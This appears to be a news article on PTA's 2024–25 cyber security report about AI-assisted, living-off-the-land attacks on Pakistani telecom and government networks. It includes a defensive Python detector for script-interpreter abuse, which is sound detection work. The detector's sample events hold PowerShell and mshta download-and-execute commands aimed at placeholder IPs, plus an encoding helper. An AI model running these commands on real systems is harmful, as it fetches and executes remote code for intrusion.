Pakistan’s telecom and government systems have come under an intensified wave of AI-powered cyberattacks, according to PTA’s Cyber Security Annual Report 2024–25. The report outlines how identity-driven, stealth-based intrusions are exploiting legitimate tools and privileges to infiltrate networks with unprecedented precision. It warns that the rise of AI-assisted deception marks a turning point in Pakistan’s cybersecurity landscape, where traditional antivirus and perimeter defenses are proving increasingly ineffective.
Data from the National Telecom Security Operations Center (nTSOC) paints a stark picture of escalating digital hostilities. Over the past year, nTSOC processed more than 10,000 critical alerts, escalated around 1,500 incidents, and blocked over 500 malicious infrastructure elements. During April and May 2025 alone, 25 Distributed Denial of Service (DDoS) attacks and over 100 dark web threats were recorded. The report also describes attackers using AI tools for precision targeting, credential theft, and lateral movement across telecom and government systems. It details a shift toward “living-off-the-land” techniques, in which adversaries abuse built-in system tools and processes rather than deploying traditional malware. These methods, often involving script interpreter abuse, obfuscation, and social engineering, let intruders operate below the radar and bypass signature-based defenses.
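The report describes the technique only in general terms. The detector below is an added example, not code from PTA, nTSOC or the report, showing what a minimal process-creation rule for script interpreter abuse looks like: it flags script hosts launched from user-facing applications, decodes PowerShell -EncodedCommand payloads before pattern matching, and scores obfuscation tell-tales such as backtick insertion and string splitting that defeat a plain keyword match. The interpreter list, parent list, thresholds and the five sample events are all constructed for illustration; the IP addresses are documentation-range placeholders, not indicators from the report.

```python
"""Heuristic detector for living-off-the-land script interpreter abuse.

Added example (not PTA/nTSOC code). Scans constructed process-creation events
of the form (parent image, child image, command line).
"""
import base64
import re

# Interpreters and proxy-execution binaries commonly abused in LOTL intrusions.
SCRIPT_HOSTS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
}
# Parents that rarely have a legitimate reason to spawn a script host.
SUSPICIOUS_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
    "acrord32.exe", "chrome.exe", "msedge.exe", "firefox.exe",
}
# Download-and-execute "cradles" and helpers looked for in the (decoded) script.
CRADLE_PATTERNS = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|"
    r"Invoke-Expression|\bIEX\b|FromBase64String|Start-BitsTransfer",
    re.IGNORECASE,
)
# PowerShell accepts any unambiguous prefix of -EncodedCommand.
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+(\S+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    try:
        raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def obfuscation_score(text: str) -> int:
    """Count obfuscation tell-tales: escape chars, string splitting, char codes, -join."""
    score = text.count("`")                      # I`E`X style escape-char insertion
    score += text.count("'+'")                   # 'Down'+'load'+'String'
    score += len(re.findall(r"\[char\]\d+", text, re.IGNORECASE))
    score += text.lower().count("-join")
    return score


def analyze_event(parent: str, child: str, cmdline: str) -> list:
    """Return the list of rule tags triggered by one process-creation event."""
    findings = []
    parent_l, child_l = parent.lower(), child.lower()
    if child_l not in SCRIPT_HOSTS:
        return findings
    if parent_l in SUSPICIOUS_PARENTS:
        findings.append("script_host_from_user_app")
    lowered = cmdline.lower()
    if "-w hidden" in lowered or "-windowstyle hidden" in lowered:
        findings.append("hidden_window")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.append("encoded_command")
    script = decoded if decoded is not None else cmdline   # match on decoded text
    if CRADLE_PATTERNS.search(script):
        findings.append("download_cradle")
    if obfuscation_score(script) >= 3:                     # threshold is illustrative
        findings.append("obfuscated_script")
    if child_l == "mshta.exe" and re.search(r"https?://|javascript:|vbscript:", lowered):
        findings.append("mshta_remote_or_inline_script")
    return findings


def scan_events(events) -> dict:
    """Map event index -> findings for every event that triggered at least one rule."""
    return {i: f for i, (p, c, cl) in enumerate(events) if (f := analyze_event(p, c, cl))}


def _encode_ps(script: str) -> str:
    """Build a PowerShell -EncodedCommand argument the way an attacker would."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events, not real telemetry: (parent, child, command line).
SAMPLE_EVENTS = [
    # 1. Macro document launching a hidden, encoded download cradle.
    ("WINWORD.EXE", "powershell.exe", "powershell.exe -nop -w hidden -enc " + _encode_ps(
        "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')")),
    # 2. Browser download handing a remote HTA to mshta.
    ("chrome.exe", "mshta.exe", "mshta.exe http://198.51.100.7/x.hta"),
    # 3. Obfuscated one-liner: keyword regex misses it, obfuscation score catches it.
    ("cmd.exe", "powershell.exe", "powershell.exe -c \"I`E`X ('Down'+'load'+'String')\" -join ''"),
    # 4. Benign: administrator running a signed maintenance script.
    ("explorer.exe", "powershell.exe", "powershell.exe -ExecutionPolicy RemoteSigned -File C:\\ops\\rotate-logs.ps1"),
    # 5. Not a script host at all.
    ("explorer.exe", "notepad.exe", "notepad.exe C:\\Users\\a\\notes.txt"),
]

if __name__ == "__main__":
    for idx, tags in scan_events(SAMPLE_EVENTS).items():
        parent, child, _ = SAMPLE_EVENTS[idx]
        print(f"event {idx}: {parent} -> {child}: {', '.join(tags)}")
```

Two design points matter in practice. Matching cradle keywords only after decoding the -EncodedCommand blob is what separates this from the signature-based checks the report says are being bypassed. And event 3 shows the limit of keyword matching: once an attacker splits or escapes the keyword, only a structural signal (the obfuscation score, or in production a parent-child and network-connection correlation) still fires.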
nTSOC’s operational insights reveal a vast and diversified threat environment. More than 150 advisories were issued through the National CERT portal, while 534 malicious IPs and domains were blocked. Hundreds of leaked credentials belonging to telecom and public-sector employees were discovered circulating on dark web marketplaces, illustrating the scale of data compromise. The most frequently targeted sectors included government agencies, telecom operators, academic institutions, and law enforcement systems. Attackers employed an array of tactics ranging from phishing and credential stuffing to ransomware and website defacements, many resulting in compromised systems and stolen access credentials later traded in underground forums.
PTA attributes many of these incursions to a handful of persistent and state-sponsored Advanced Persistent Threat (APT) groups. Among the most active were Sidewinder, employing localized decoy documents and beaconing commands; APT36, weaponizing Android spyware and malicious PDFs; APT41, exploiting software supply chain flaws; and Turla, using steganography and watering-hole attacks. Hacktivist collectives such as R00TK1T were also identified for targeting judicial and municipal websites through coordinated defacement campaigns. PTA emphasizes that phishing, exploitation of unpatched systems, and misuse of remote access continue to serve as the main gateways for such breaches.
To fortify national cyber resilience, PTA recommends adopting multi-factor authentication across all digital infrastructure, implementing zero-trust access models, and enabling automated intelligence sharing across sectors. It also calls for cross-sector cyber drills and legal mandates requiring breach disclosures within 48 to 72 hours. While the telecom industry’s security posture is showing signs of maturity—with 88% of licensees rated as “Excellent” or “Very Good”—the report highlights persistent gaps in application security, encryption, and network visibility. PTA concludes that sustained investment, stronger inter-agency collaboration, and the adoption of CTDISR-2025 cybersecurity controls are vital to securing Pakistan’s digital future against increasingly adaptive AI-driven threats.